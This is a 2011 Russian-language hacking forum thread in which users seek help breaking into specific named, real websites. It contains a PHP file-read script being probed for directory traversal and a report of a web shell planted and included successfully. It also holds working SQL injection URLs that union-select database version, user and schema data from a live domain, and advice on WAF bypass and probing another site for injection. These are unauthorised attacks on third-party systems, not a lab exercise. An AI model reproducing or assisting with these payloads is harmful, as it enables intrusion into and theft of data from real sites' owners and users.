 |
|
11.05.2011, 00:14
|
|
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
С нами:
9129884
Репутация:
240
|
|
Подскажите как перейти в директорию выше если проверяет наличие .. ?
/news/index.php
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"]05/04/10";
[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]file[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$ref[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$ref[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]preg_replace[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"/news\//"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]""[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$ref[/COLOR][COLOR="#007700"]);
echo[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$str[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
[/COLOR][COLOR="#0000BB"]$out_str[/COLOR][COLOR="#007700"].=[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$arr[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"]].[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"];
for ([/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"];[/COLOR][COLOR="#0000BB"]$i[/COLOR][COLOR="#007700"]Вернуться'[/COLOR][COLOR="#007700"]);
}
if(isset([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]])){
[/COLOR][COLOR="#0000BB"]show_page[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$_GET[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'view'[/COLOR][COLOR="#007700"]]);
}else{
[/COLOR][COLOR="#0000BB"]show_all_news[/COLOR][COLOR="#007700"]();
}
[/COLOR][COLOR="#0000BB"]?>
[/COLOR][/COLOR]
|
|
|
11.05.2011, 00:38
|
|
Новичок
Регистрация: 05.05.2011
Сообщений: 8
С нами:
7906646
Репутация:
0
|
|
Сообщение от попугай
Понял. Тогда дай /home/username и шеллу права 777 и снова проинклюдь
ОМГ. прокатило) спасибо!(там еще проблема в том что в шелле ссылки релатив, но это уже дело техники, разберусь). Реально помог.
|
|
|
|
11.05.2011, 03:52
|
|
Новичок
Регистрация: 17.04.2011
Сообщений: 7
С нами:
7932566
Репутация:
0
|
|
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?
|
|
|
|
11.05.2011, 04:03
|
|
Познавший АНТИЧАТ
Регистрация: 16.07.2010
Сообщений: 1,022
С нами:
8328566
Репутация:
935
|
|
Сообщение от SaNn
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?
onsalecell.com где здесь скуля?
|
|
|
|
11.05.2011, 12:22
|
|
Познающий
Регистрация: 17.04.2009
Сообщений: 59
С нами:
8982831
Репутация:
37
|
|
Сообщение от SaNn
Такой вопрос...
Нашел SQL Injection сайте из моего предыдущего поста.
Просканил information_schema на предмет баз данных, таблиц и их колонок. Нашел нужные мне.
Но там есть некоторые колонки, пытаясь просмотреть содержимое которых у меня возникает ошибка. Ошибка та-же 500 internal server error.
В чем может быть проблема?
Как её можно решить?
Скорее всего WAF стоит. Пробуй различные обходы WAF
|
|
|
|
11.05.2011, 23:08
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Не могу таблицы посчитать,
http://www.iorta.com/catalog.php?catid=47+and+1=0+union+select+unhex(he x(concat_ws(0x3a,version(),database(),user(),@@ver sion_compile_os))),2+--+
5.0.1-alpha-log:trade:tradeuser@localhostc-linux
тут, все выводит, а дальше не получается
http://www.iorta.com/catalog.php?catid=-47+union+select+1,count(*)+from+information_schema .tables+--+
Что можете посоветовать?
|
|
|
|
11.05.2011, 23:24
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
FlaktW
не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было
|
|
|
|
11.05.2011, 23:26
|
|
Участник форума
Регистрация: 19.08.2009
Сообщений: 115
С нами:
8803961
Репутация:
8
|
|
Сообщение от Konqi
FlaktW
не скажу на 100%, но на сколько я помню, в мускул 5.0.1 альфа information_schema еще не было
Наверное, ты прав!
|
|
|
|
11.05.2011, 23:31
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
С нами:
8885780
Репутация:
672
|
|
пруф |
|
|
|
12.05.2011, 15:54
|
|
Постоянный
Регистрация: 17.04.2011
Сообщений: 638
С нами:
7932566
Репутация:
81
|
|
Возможно ли, если показывает пустую страницу (как тут: http://www.goldenformula.net/news.php?id=%27) что там есть скуль?!
|
|
|
|
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
